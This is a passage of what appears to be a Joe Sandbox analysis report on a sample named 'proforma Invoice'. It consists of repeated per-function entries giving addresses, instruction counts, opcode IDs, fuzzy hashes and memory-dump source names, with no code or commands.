                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction ID: c5e9be65ef261fe6354b437535dcc9c4bb388ab4726835b0e44ab9891eb530f8
                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction Fuzzy Hash: 9AE0D8323416012BE7259E598CC0F477B6EDFD2B14F440479BA045F251CBF2DC0982A4
                                                                          Function 011F6030 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction ID: f283b281413bc8ae5c360eb698c52128ad9f82ccfaafbe812cf00e1c2855e60d
                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction Fuzzy Hash: 69F06572104204DFE3298F09DD44F52B7F9EB05364F66C429E7099B661D37AEC40CBA4
                                                                          Function 01160710 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction ID: 5e8c4a513dc4f08f9e79f96d8ef4e7fc2ad847995f4f99929c8bc3ab86408bf1
                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction Fuzzy Hash: 9CF0E5392047419BDB1EDF19D040AE57BE8FB55360F010094F8828B301D736E991CB91
                                                                          Function 011949D0 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction ID: ba0a4cc93b08602df5a084b4eef987c388f3ecd3cef77f999113de46d821c8d5
                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction Fuzzy Hash: 0FE0D832244145ABDB295A598900B6677A6DBD27A0F160429E2129BA50DB78DC42C7D8
                                                                          Function 0120678E Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction ID: 7b85c4c8497bb8a055f1d80164c1d4e2312fa095356f00834235e7ed02cc9f51
                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction Fuzzy Hash: BAE0DF32A40120BBEB2697998E01F9ABEFDDBA0EA4F050058B600E71E0E630DE00C690
                                                                          Function 011625E0 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e5ebf813c84f7c7aab0adabeea03784e3c6488239a47497316881225d7f789d3
                                                                          • Instruction ID: 3aed9e4a3d4283bf07664b961f87416249a1c366915f81847533d3248112729a
                                                                          • Opcode Fuzzy Hash: e5ebf813c84f7c7aab0adabeea03784e3c6488239a47497316881225d7f789d3
                                                                          • Instruction Fuzzy Hash: 23E0D8321006549BC325FF29DD41F8B7BAEEF64368F014515F11557590CB35AD10C7D4
                                                                          Function 011E4000 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction ID: 4b6b95ce1f4c1cb9d6ae6a491e439b637d4ebc55792e3fc3d57b23d2bc7e1e99
                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction Fuzzy Hash: 9AE0AE343006058BE719CF59C044BA27BE6BFD5A10F28C078A9488F605EB32A8428A40
                                                                          Function 0119CA38 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c610cb76183b708326078ebf15336ddb1a5e859e87165b961840ed3eb35a3a7
                                                                          • Instruction ID: d9692a1d3160bc1bfc8eeac1adad28df398e5fac897e5937dee75c8e5d46dced
                                                                          • Opcode Fuzzy Hash: 7c610cb76183b708326078ebf15336ddb1a5e859e87165b961840ed3eb35a3a7
                                                                          • Instruction Fuzzy Hash: C2D02B324814706ACF7DF1187C04F973A5AAB64270F028C60F118D2010E768CC8196C4
                                                                          Function 0115823B Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                          • Instruction ID: a19a9d9030b79bb9b5948726c76201ff348ed4504d8071c88e4773a5158450a9
                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                          • Instruction Fuzzy Hash: 43E0C231104A10EFDB3E2F2BDC00F517EB1FF54B94F11482AE492068B48770AC82DB46
                                                                          Function 01162050 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2f7c824a7b6fb1b317849a3869df64bd250cef84293ff1bdf0d148dbb3d4b81
                                                                          • Instruction ID: 9c5563288643d475c4dd159d6613de0267b297674cb2066687c1e62ac1d0183d
                                                                          • Opcode Fuzzy Hash: d2f7c824a7b6fb1b317849a3869df64bd250cef84293ff1bdf0d148dbb3d4b81
                                                                          • Instruction Fuzzy Hash: 80E0C2321005506BC315FB6DED40F4A73AEEFA5264F004221F151876D4CB35ED11C794
                                                                          Function 01198A90 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction ID: 051233e63aaee1410e5d4cb7eef3afeb64887ce74ce1a91b69d997f70c6023e8
                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction Fuzzy Hash: AAE08633511A188BC72CDE18D512B7277A4EF45720F09463EA62347780C634E544C795
                                                                          Function 011B6AA4 Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction ID: 9631b43db49e46f42fcd59566d9f15248a91694934238800a78045058693e3e2
                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction Fuzzy Hash: 45D05E36511A50AFD7369F2BEE40C53BBF9FBD4A10705062FE54583A24C770A806DBA0
                                                                          Function 0119E59C Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction ID: 597318e121501ec63868c886294346402d671ae542e203c8c178bfaf4f067106
                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction Fuzzy Hash: 80D0A932214620ABE736AA2CFC00FC333E8BB98724F06045AB018C7150C360AC82CA84
                                                                          Function 011DE908 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction ID: 92e393d17690c3b33875f008503848d856c9ee64ef6e9d7f94f085eb94b7ae6a
                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction Fuzzy Hash: D1E0EC359526849FDF1ADF69C640F5ABBB9BB94B40F550054A1085F660D725A901CB80
                                                                          Function 0115A0E3 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction ID: 865dd604fcdeb1f18c00009027fbec81212a343c80aed3ad3c7cf6f4bf8fcdba
                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction Fuzzy Hash: 75D02232362030D3DB2C56657800F637919AF80A94F0A012D382A93900C2048C43D2E0
                                                                          Function 0119A830 Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction ID: 5e1dea3cce4f905eee4e1143223b075e7a280283e10907c8886d97d8b40adc41
                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction Fuzzy Hash: DBD022370E010CBBCB119F62CC01F903BA8E760BA0F004020B504871A0C63AE950D580
                                                                          Function 0119CA24 Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b1025ade4bd7134976fe74b4cc7c29cf5ebd54b9abd71d42cb92abe22d36f8d
                                                                          • Instruction ID: 1e17b9a28aab7b26801717716ccfd7111b54303ebc6d902ab3d2cd9cf66de5ad
                                                                          • Opcode Fuzzy Hash: 1b1025ade4bd7134976fe74b4cc7c29cf5ebd54b9abd71d42cb92abe22d36f8d
                                                                          • Instruction Fuzzy Hash: 04D0A930611102CFEF2ECF18CA50F6E3AB0FF10640B80016CE75092520F32CDC02CA90
                                                                          Function 011702A0 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction ID: 0c66820cec0e900a28a33b17be297671bd4557887c784a1d0b200e45ab081fa1
                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction Fuzzy Hash: 4CD09236616E80CFD61E8B0CC5A4B1533B4BB49A44F810490E401CBB22E728E980CA00
                                                                          Function 0119C700 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction ID: 9ddb19dcddf1c5cfd1eaa2946c5e532462c50a6f4f842d69fbeafebc1987006b
                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction Fuzzy Hash: 78C01232150644AFD7159A95CD01F0177A9E798B40F000021F20447670C631E911E644
                                                                          Function 01180310 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction ID: 1a28381dc1c6fd6a003594a5d89b36278a0ffb5270bb5e027fd47eb9f29443fc
                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction Fuzzy Hash: DCD0123610024CEFCB06EF41D890D9A772AFBD8710F108019FD19077108A31ED62DA50
                                                                          Function 01160750 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction ID: 3b36b5405bcfa155083d23a523bb5c29083d4657a7ec304bd30cc06c60ce8184
                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction Fuzzy Hash: A1C04879712A428FCF1ADB2AD2D4F8977F4FB44754F150890E809CBB22E724E801DA11
                                                                          Function 01234DAD Relevance: .0, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                          • Instruction ID: a083a994949ac9c69469ba7ef491b3f436932e4e643d46c85e30d049bea52195
                                                                          • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                          • Instruction Fuzzy Hash: B7B01232212545CFC7137720CB00B1832EABF017D0F0940F0650089830D7288910EA01
                                                                          Function 011A3010 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e8673e44f2489aafd7f3bef25876e0f02721f69142f1fc874e9a1604e4e2e24
                                                                          • Instruction ID: 45b63d528364833390940baae2b97943331d4feb0afb804ab8f31e5005814ba6
                                                                          • Opcode Fuzzy Hash: 5e8673e44f2489aafd7f3bef25876e0f02721f69142f1fc874e9a1604e4e2e24
                                                                          • Instruction Fuzzy Hash: 5190022120184442D14472684D44B4F410997E1602F95C019E4157554CCA1589555B21
                                                                          Function 011A3090 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cff01d605189e84b89c12c76498b0c43ba8447685a5c28758802ed10dc3d927d
                                                                          • Instruction ID: 5add0a325c0f34cdc89a99db142efee59e6944c74197383879d6c074a9925b2a
                                                                          • Opcode Fuzzy Hash: cff01d605189e84b89c12c76498b0c43ba8447685a5c28758802ed10dc3d927d
                                                                          • Instruction Fuzzy Hash: 8890022124140802D14471688954747000AD7D0A01F55C011E0026554DC7168A656BB1
                                                                          Function 011A4340 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 27a60d0374c99d19cfcb97ae80bf7f154466ea8db0c7ad55891a03a5e1df42e8
                                                                          • Instruction ID: 5aa210cc54ad032e794b9de46b773a12ce9092778e133c6a46101c2a13db1442
                                                                          • Opcode Fuzzy Hash: 27a60d0374c99d19cfcb97ae80bf7f154466ea8db0c7ad55891a03a5e1df42e8
                                                                          • Instruction Fuzzy Hash: D890023160580012914471684DC45864009A7E0701B55C011E0426554CCB148A565761
                                                                          Function 011A4650 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8a96f56ca446d7b0cf041f367979666c6a9b22d18ebd89885c831b1c0b569ad
                                                                          • Instruction ID: bf2d63b6233268dcc41d3e42c7890cfe4571af41cd1a47bd799653759a04ae4a
                                                                          • Opcode Fuzzy Hash: b8a96f56ca446d7b0cf041f367979666c6a9b22d18ebd89885c831b1c0b569ad
                                                                          • Instruction Fuzzy Hash: AE90026160150042414471684D444466009A7E1701395C115E0556560CC71889559769
                                                                          Function 011A2B80 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb624544fb45e6580931ddfa3db554668807ef7b263a0dae8eac9b823d5ff75b
                                                                          • Instruction ID: 4f10fd0600ca46b12933de82fd898e94e6f8dc943ce48cba679399d3ab3d0314
                                                                          • Opcode Fuzzy Hash: bb624544fb45e6580931ddfa3db554668807ef7b263a0dae8eac9b823d5ff75b
                                                                          • Instruction Fuzzy Hash: 8A90023120140802D10871684D446C6000997D0701F55C011E6026655ED76589917631
                                                                          Function 011A2BA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bed18271977b68032d85e361686a643ef6a4b05ed824cddd19ed6aca4a99cfd9
                                                                          • Instruction ID: 24f763943418d3864546490fe7509ca6314eafb4bc1b3d51551f0ce10488e3d5
                                                                          • Opcode Fuzzy Hash: bed18271977b68032d85e361686a643ef6a4b05ed824cddd19ed6aca4a99cfd9
                                                                          • Instruction Fuzzy Hash: 6F90023160540802D15471684954786000997D0701F55C011E0026654DC7558B557BA1
                                                                          Function 011A2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dbc279f5713aa9298c1c926dc8847e3689b978eb20836730fd9c0df399d34d4
                                                                          • Instruction ID: 6c80909dfb8278cab3e40a04e16b06e7527b73cfe84a974e7fe3e851eb69584e
                                                                          • Opcode Fuzzy Hash: 3dbc279f5713aa9298c1c926dc8847e3689b978eb20836730fd9c0df399d34d4
                                                                          • Instruction Fuzzy Hash: F290023120140802D1847168494468A000997D1701F95C015E0027654DCB158B597BA1
                                                                          Function 011A2BE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8206d0b84bd908d070896b8a7b7c5157d32c0edaa8daeb171e014f749a700ad1
                                                                          • Instruction ID: a6801604ad9b15a58308761e9ec3c132753a4e881f9f9dcbb2c926083d3f64d8
                                                                          • Opcode Fuzzy Hash: 8206d0b84bd908d070896b8a7b7c5157d32c0edaa8daeb171e014f749a700ad1
                                                                          • Instruction Fuzzy Hash: 5990023120544842D14471684944A86001997D0705F55C011E0066694DD7258E55BB61
                                                                          Function 011A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aec0e875bdce80d586e1215d35f75aad970cf0c887fc7bcb1f9adb7eb42a05f9
                                                                          • Instruction ID: 83f7b2ac6ae84a7e9414d2c15ee99bfbf3b2e02bb7d3b66260e8aed7392cbdd0
                                                                          • Opcode Fuzzy Hash: aec0e875bdce80d586e1215d35f75aad970cf0c887fc7bcb1f9adb7eb42a05f9
                                                                          • Instruction Fuzzy Hash: 599002A1201540924504B2688944B4A450997E0601B55C016E1056560CC62589519635
                                                                          Function 011A2AD0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cb7119231e15ba47938f96b5fc493abbd240a68a9def0e367ccfc9d1218f388
                                                                          • Instruction ID: 1088a5e499f384d6f7d5ea8a513142f467944e9ff0489b764b3a56721f3356e6
